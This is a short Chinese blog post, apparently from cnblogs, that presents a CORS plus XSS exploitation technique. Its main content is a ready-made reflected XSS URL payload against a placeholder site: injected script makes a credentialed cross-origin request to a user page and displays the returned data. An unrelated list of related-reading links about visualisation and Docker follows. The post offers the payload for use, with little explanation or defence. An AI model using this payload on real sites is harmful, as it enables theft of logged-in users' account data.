CORS+XSS的漏洞利用payload

之前有人问我有没有CORS+XSS的利用姿势，翻了一下国内貌似都没有利用姿势于是就写了这篇文章！！！

首先找到一个反射xss，然后使用xss加载javascript代码达到跨域劫持目的payload如下：

http://xxx.com/index.php?uname=<script>function cors() { var xhttp = new XMLHttpRequest(); xhttp.onreadystatechange = function() { if (this.readyState == 4 && this.status == 200) { alert(this.responseText); document.getElementById("demo").innerHTML = this.responseText; } }; xhttp.open("GET", "http://xxx.com/user.php", true); xhttp.withCredentials = true; xhttp.send();}cors();</script>

相关阅读:
docker命令大全
centos mysql 实战第二十六节课 mysql in docker
赋予楼宇“智慧大脑”：厦门双子塔3D可视化
智慧矿山-选矿工艺数字 3D 可视化
数字孪生赋能工业发展：可视化“智”造航天新里程
浅谈可视化设计-数据时代的美味“烹饪师”（下篇）
工业互联网背景下的高炉炉体三维热力图监控系统
浅谈可视化设计-数据时代的美味“烹饪师”（上篇）
加速城市轨道交通发展，数字化运营新基建搭建地铁管理系统
加油站三维可视化监控系统，安全管理智慧运营

原文地址：https://www.cnblogs.com/Matsec/p/11295842.html